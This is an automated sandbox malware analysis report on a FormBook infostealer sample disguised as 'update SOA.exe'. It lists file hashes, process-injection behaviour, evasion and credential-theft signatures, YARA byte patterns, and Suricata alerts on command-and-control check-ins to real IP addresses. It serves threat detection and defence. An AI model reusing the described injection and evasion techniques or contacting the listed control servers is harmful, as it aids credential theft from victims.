Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
update SOA.exe

Overview

General Information

Sample name:update SOA.exe
Analysis ID:1522849
MD5:309a3f5ca72ff071a0edd351eb3c6691
SHA1:64a06df557469bda25a3d3b6526a9e7eade67f63
SHA256:cad71f61562fdc34dafc567081d21ff6044322ff75b67c3b5172fba7f4ee1e5d
Tags:exeFormbookuser-cocaman
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • update SOA.exe (PID: 1812 cmdline: "C:\Users\user\Desktop\update SOA.exe" MD5: 309A3F5CA72FF071A0EDD351EB3C6691)
    • svchost.exe (PID: 2788 cmdline: "C:\Users\user\Desktop\update SOA.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • HAdkDWMZRiGMZe.exe (PID: 2296 cmdline: "C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • notepad.exe (PID: 2656 cmdline: "C:\Windows\SysWOW64\notepad.exe" MD5: E92D3A824A0578A50D2DD81B5060145F)
          • HAdkDWMZRiGMZe.exe (PID: 1220 cmdline: "C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4568 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c060:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1412f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x27f16d:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x26723c:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e693:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16762:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f493:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17562:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Process Parents
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe" , CommandLine: "C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe, NewProcessName: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe, OriginalFileName: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe, ParentCommandLine: "C:\Windows\SysWOW64\notepad.exe", ParentImage: C:\Windows\SysWOW64\notepad.exe, ParentProcessId: 2656, ParentProcessName: notepad.exe, ProcessCommandLine: "C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe" , ProcessId: 1220, ProcessName: HAdkDWMZRiGMZe.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\update SOA.exe", CommandLine: "C:\Users\user\Desktop\update SOA.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\update SOA.exe", ParentImage: C:\Users\user\Desktop\update SOA.exe, ParentProcessId: 1812, ParentProcessName: update SOA.exe, ProcessCommandLine: "C:\Users\user\Desktop\update SOA.exe", ProcessId: 2788, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\update SOA.exe", CommandLine: "C:\Users\user\Desktop\update SOA.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\update SOA.exe", ParentImage: C:\Users\user\Desktop\update SOA.exe, ParentProcessId: 1812, ParentProcessName: update SOA.exe, ProcessCommandLine: "C:\Users\user\Desktop\update SOA.exe", ProcessId: 2788, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-30T18:44:31.185960+020020507451Malware Command and Control Activity Detected192.168.2.549711137.175.33.5680TCP
            2024-09-30T18:44:54.473989+020020507451Malware Command and Control Activity Detected192.168.2.5497163.33.130.19080TCP
            2024-09-30T18:45:08.252588+020020507451Malware Command and Control Activity Detected192.168.2.5497203.33.130.19080TCP
            2024-09-30T18:45:24.969888+020020507451Malware Command and Control Activity Detected192.168.2.549724188.114.96.380TCP
            2024-09-30T18:45:39.051168+020020507451Malware Command and Control Activity Detected192.168.2.54972831.31.196.1780TCP
            2024-09-30T18:45:52.448504+020020507451Malware Command and Control Activity Detected192.168.2.5497323.33.130.19080TCP
            2024-09-30T18:46:06.630905+020020507451Malware Command and Control Activity Detected192.168.2.5497363.33.130.19080TCP
            2024-09-30T18:46:20.598814+020020507451Malware Command and Control Activity Detected192.168.2.549740199.192.21.16980TCP
            2024-09-30T18:46:34.481837+020020507451Malware Command and Control Activity Detected192.168.2.5497443.33.130.19080TCP
            2024-09-30T18:46:47.677651+020020507451Malware Command and Control Activity Detected192.168.2.549748188.114.96.380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-30T18:44:31.185960+020028554651A Network Trojan was detected192.168.2.549711137.175.33.5680TCP
            2024-09-30T18:44:54.473989+020028554651A Network Trojan was detected192.168.2.5497163.33.130.19080TCP
            2024-09-30T18:45:08.252588+020028554651A Network Trojan was detected192.168.2.5497203.33.130.19080TCP
            2024-09-30T18:45:24.969888+020028554651A Network Trojan was detected192.168.2.549724188.114.96.380TCP
            2024-09-30T18:45:39.051168+020028554651A Network Trojan was detected192.168.2.54972831.31.196.1780TCP
            2024-09-30T18:45:52.448504+020028554651A Network Trojan was detected192.168.2.5497323.33.130.19080TCP
            2024-09-30T18:46:06.630905+020028554651A Network Trojan was detected192.168.2.5497363.33.130.19080TCP
            2024-09-30T18:46:20.598814+020028554651A Network Trojan was detected192.168.2.549740199.192.21.16980TCP
            2024-09-30T18:46:34.481837+020028554651A Network Trojan was detected192.168.2.5497443.33.130.19080TCP
            2024-09-30T18:46:47.677651+020028554651A Network Trojan was detected192.168.2.549748188.114.96.380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-30T18:44:46.814759+020028554641A Network Trojan was detected192.168.2.5497133.33.130.19080TCP
            2024-09-30T18:44:50.271880+020028554641A Network Trojan was detected192.168.2.5497143.33.130.19080TCP
            2024-09-30T18:44:51.911631+020028554641A Network Trojan was detected192.168.2.5497153.33.130.19080TCP
            2024-09-30T18:45:00.003802+020028554641A Network Trojan was detected192.168.2.5497173.33.130.19080TCP
            2024-09-30T18:45:02.521743+020028554641A Network Trojan was detected192.168.2.5497183.33.130.19080TCP
            2024-09-30T18:45:05.075570+020028554641A Network Trojan was detected192.168.2.5497193.33.130.19080TCP
            2024-09-30T18:45:15.518326+020028554641A Network Trojan was detected192.168.2.549721188.114.96.380TCP
            2024-09-30T18:45:18.127639+020028554641A Network Trojan was detected192.168.2.549722188.114.96.380TCP
            2024-09-30T18:45:20.674358+020028554641A Network Trojan was detected192.168.2.549723188.114.96.380TCP
            2024-09-30T18:45:30.783978+020028554641A Network Trojan was detected192.168.2.54972531.31.196.1780TCP
            2024-09-30T18:45:33.928191+020028554641A Network Trojan was detected192.168.2.54972631.31.196.1780TCP
            2024-09-30T18:45:36.499997+020028554641A Network Trojan was detected192.168.2.54972731.31.196.1780TCP
            2024-09-30T18:45:44.803733+020028554641A Network Trojan was detected192.168.2.5497293.33.130.19080TCP
            2024-09-30T18:45:47.605022+020028554641A Network Trojan was detected192.168.2.5497303.33.130.19080TCP
            2024-09-30T18:45:49.890046+020028554641A Network Trojan was detected192.168.2.5497313.33.130.19080TCP
            2024-09-30T18:45:57.946440+020028554641A Network Trojan was detected192.168.2.5497333.33.130.19080TCP
            2024-09-30T18:46:00.491065+020028554641A Network Trojan was detected192.168.2.5497343.33.130.19080TCP
            2024-09-30T18:46:03.052545+020028554641A Network Trojan was detected192.168.2.5497353.33.130.19080TCP
            2024-09-30T18:46:12.840052+020028554641A Network Trojan was detected192.168.2.549737199.192.21.16980TCP
            2024-09-30T18:46:15.509966+020028554641A Network Trojan was detected192.168.2.549738199.192.21.16980TCP
            2024-09-30T18:46:18.150197+020028554641A Network Trojan was detected192.168.2.549739199.192.21.16980TCP
            2024-09-30T18:46:26.314021+020028554641A Network Trojan was detected192.168.2.5497413.33.130.19080TCP
            2024-09-30T18:46:29.738124+020028554641A Network Trojan was detected192.168.2.5497423.33.130.19080TCP
            2024-09-30T18:46:31.922116+020028554641A Network Trojan was detected192.168.2.5497433.33.130.19080TCP
            2024-09-30T18:46:40.040590+020028554641A Network Trojan was detected192.168.2.549745188.114.96.380TCP
            2024-09-30T18:46:42.546070+020028554641A Network Trojan was detected192.168.2.549746188.114.96.380TCP
            2024-09-30T18:46:45.069786+020028554641A Network Trojan was detected192.168.2.549747188.114.96.380TCP
            2024-09-30T18:46:53.641925+020028554641A Network Trojan was detected192.168.2.54974984.32.84.3280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: update SOA.exeReversingLabs: Detection: 42%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: update SOA.exeJoe Sandbox ML: detected
            Source: update SOA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: notepad.pdbGCTL source: svchost.exe, 00000002.00000003.2312196681.0000000003443000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2312112066.000000000341A000.00000004.00000020.00020000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000002.3882959194.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: notepad.pdb source: svchost.exe, 00000002.00000003.2312196681.0000000003443000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2312112066.000000000341A000.00000004.00000020.00020000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000002.3882959194.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HAdkDWMZRiGMZe.exe, 00000004.00000000.2266285714.00000000004CE000.00000002.00000001.01000000.00000005.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3882332650.00000000004CE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: update SOA.exe, 00000000.00000003.2070210673.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2071406574.0000000004890000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2070693180.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250582687.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2252532945.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000005.00000003.2349001032.0000000004AEC000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000005.00000003.2347352548.0000000004935000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: update SOA.exe, 00000000.00000003.2070210673.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2071406574.0000000004890000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2070693180.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2250582687.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2252532945.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, notepad.exe, 00000005.00000003.2349001032.0000000004AEC000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000005.00000003.2347352548.0000000004935000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: notepad.exe, 00000005.00000002.3882543699.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3885110150.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.00000000030BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2635917732.000000002370C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: notepad.exe, 00000005.00000002.3882543699.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3885110150.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.00000000030BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2635917732.000000002370C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B9C520 FindFirstFileW,FindNextFileW,FindClose,5_2_02B9C520
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 4x nop then xor eax, eax5_2_02B89B80
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 4x nop then mov ebx, 00000004h5_2_04B804E8
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4x nop then pop edi6_2_0553769B
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4x nop then mov esp, ebp6_2_05535029
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4x nop then xor eax, eax6_2_0553ABB1

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49722 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49745 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49720 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49735 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49739 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49711 -> 137.175.33.56:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49711 -> 137.175.33.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49721 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49715 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49720 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49729 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49728 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49728 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49725 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49743 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49730 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49748 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49748 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49736 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49736 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49719 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49741 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49734 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49746 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49716 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49716 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49717 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49740 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49740 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49724 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49724 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49718 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49714 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49727 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49747 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49731 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49742 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49738 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49726 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49733 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49749 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49723 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49713 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49732 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49732 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49737 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49744 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49744 -> 3.33.130.190:80
            Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
